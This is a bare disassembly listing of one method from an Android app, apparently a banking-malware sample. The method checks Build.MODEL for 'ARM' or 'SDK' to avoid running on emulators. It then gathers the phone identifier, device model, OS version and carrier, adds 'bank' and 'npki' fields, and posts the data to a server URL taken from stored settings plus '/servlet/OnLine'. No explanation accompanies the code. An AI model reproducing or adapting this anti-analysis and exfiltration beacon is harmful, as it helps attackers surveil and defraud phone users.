# Lkk/chunyu/MainActivity$2;->run()V [access_flags=public]
#
# Parameters:
# local registers: v0...v8
#
# - return:void

run-BB@0x0 : [ run-BB@0x3e run-BB@0x40 ]
	0       (00000000) const/4              v5, -1
	1       (00000002) const-string         v3, 'shit'
	2       (00000006) const-string         v4, '1'
	3       (0000000a) invoke-static        v3, v4, Landroid/util/Log;->i(Ljava/lang/String; Ljava/lang/String;)I
	4       (00000010) new-instance         v1, Lorg/json/JSONObject;
	5       (00000014) invoke-direct        v1, Lorg/json/JSONObject;-><init>()V
	6       (0000001a) iget-object          v3, v8, Lkk/chunyu/MainActivity$2;->this$0 Lkk/chunyu/MainActivity;
	7       (0000001e) invoke-virtual       v3, Lkk/chunyu/MainActivity;->getApplicationContext()Landroid/content/Context;
	8       (00000024) move-result-object   v3
	9       (00000026) invoke-static        v3, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	10      (0000002c) move-result-object   v2
	11      (0000002e) const-string         v3, '88'
	12      (00000032) invoke-virtual       v3, v2, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	13      (00000038) move-result          v3
	14      (0000003a) if-eqz               v3, +3

run-BB@0x3e : 
	15      (0000003e) return-void          

run-BB@0x40 : [ run-BB@0x72 run-BB@0x3e ]
	16      (00000040) const-string         v3, 'mobile'
	17      (00000044) iget-object          v4, v8, Lkk/chunyu/MainActivity$2;->this$0 Lkk/chunyu/MainActivity;
	18      (00000048) invoke-virtual       v4, Lkk/chunyu/MainActivity;->getApplicationContext()Landroid/content/Context;
	19      (0000004e) move-result-object   v4
	20      (00000050) invoke-static        v4, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	21      (00000056) move-result-object   v4
	22      (00000058) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	23      (0000005e) sget-object          v3, Landroid/os/Build;->MODEL Ljava/lang/String;
	24      (00000062) const-string         v4, 'ARM'
	25      (00000066) invoke-virtual       v3, v4, Ljava/lang/String;->indexOf(Ljava/lang/String;)I
	26      (0000006c) move-result          v3
	27      (0000006e) if-ne                v3, v5, -18
	40:15d
	(Lorg/json/JSONException; -> 162 run-BB@0x162)

run-BB@0x72 : [ run-BB@0x86 run-BB@0x3e ]
	28      (00000072) sget-object          v3, Landroid/os/Build;->MODEL Ljava/lang/String;
	29      (00000076) const-string         v4, 'SDK'
	30      (0000007a) invoke-virtual       v3, v4, Ljava/lang/String;->indexOf(Ljava/lang/String;)I
	31      (00000080) move-result          v3
	32      (00000082) if-ne                v3, v5, -22
	40:15d
	(Lorg/json/JSONException; -> 162 run-BB@0x162)

run-BB@0x86 : [ run-BB@0x3e ]
	33      (00000086) const-string         v3, 'machine'
	34      (0000008a) sget-object          v4, Landroid/os/Build;->MODEL Ljava/lang/String;
	35      (0000008e) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	36      (00000094) const-string         v3, 'sversion'
	37      (00000098) sget-object          v4, Landroid/os/Build$VERSION;->RELEASE Ljava/lang/String;
	38      (0000009c) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	39      (000000a2) const-string         v3, 'bank'
	40      (000000a6) const-string         v4, ''
	41      (000000aa) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	42      (000000b0) const-string         v3, 'provider'
	43      (000000b4) iget-object          v4, v8, Lkk/chunyu/MainActivity$2;->this$0 Lkk/chunyu/MainActivity;
	44      (000000b8) invoke-static        v4, Lkk/util/NetUtil;->getProvidersName(Landroid/content/Context;)Ljava/lang/String;
	45      (000000be) move-result-object   v4
	46      (000000c0) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	47      (000000c6) const-string         v3, 'npki'
	48      (000000ca) const-string         v4, '1'
	49      (000000ce) invoke-virtual       v1, v3, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	50      (000000d4) iget-object          v3, v8, Lkk/chunyu/MainActivity$2;->this$0 Lkk/chunyu/MainActivity;
	51      (000000d8) new-instance         v4, Ljava/lang/StringBuilder;
	52      (000000dc) invoke-direct        v4, Ljava/lang/StringBuilder;-><init>()V
	53      (000000e2) iget-object          v5, v8, Lkk/chunyu/MainActivity$2;->this$0 Lkk/chunyu/MainActivity;
	54      (000000e6) iget-object          v5, v5, Lkk/chunyu/MainActivity;->sp Lkk/util/SPUtil;
	55      (000000ea) const-string         v6, 'URL'
	56      (000000ee) const-string         v7, ''
	57      (000000f2) invoke-virtual       v5, v6, v7, Lkk/util/SPUtil;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	58      (000000f8) move-result-object   v5
	59      (000000fa) invoke-virtual       v4, v5, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	60      (00000100) move-result-object   v4
	61      (00000102) const-string         v5, '/servlet/OnLine'
	62      (00000106) invoke-virtual       v4, v5, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	63      (0000010c) move-result-object   v4
	64      (0000010e) invoke-virtual       v4, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	65      (00000114) move-result-object   v4
	66      (00000116) new-instance         v5, Ljava/lang/StringBuilder;
	67      (0000011a) invoke-direct        v5, Ljava/lang/StringBuilder;-><init>()V
	68      (00000120) const-string         v6, '{"json":"'
	69      (00000124) invoke-virtual       v5, v6, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	70      (0000012a) move-result-object   v5
	71      (0000012c) invoke-virtual       v1, Lorg/json/JSONObject;->toString()Ljava/lang/String;
	72      (00000132) move-result-object   v6
	73      (00000134) invoke-static        v6, Lkk/util/StUtil;->stringToJson(Ljava/lang/String;)Ljava/lang/String;
	74      (0000013a) move-result-object   v6
	75      (0000013c) invoke-virtual       v5, v6, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	76      (00000142) move-result-object   v5
	77      (00000144) const-string         v6, '"}'
	78      (00000148) invoke-virtual       v5, v6, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	79      (0000014e) move-result-object   v5
	80      (00000150) invoke-virtual       v5, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	81      (00000156) move-result-object   v5
	82      (00000158) invoke-static        v3, v4, v5, Lkk/util/StUtil;->postJson(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	83      (0000015e) goto/16              -90

run-BB@0x162 : [ run-BB@0x3e ]
	84      (00000162) move-exception       v0
	85      (00000164) invoke-virtual       v0, Lorg/json/JSONException;->printStackTrace()V
	86      (0000016a) goto/16              -96

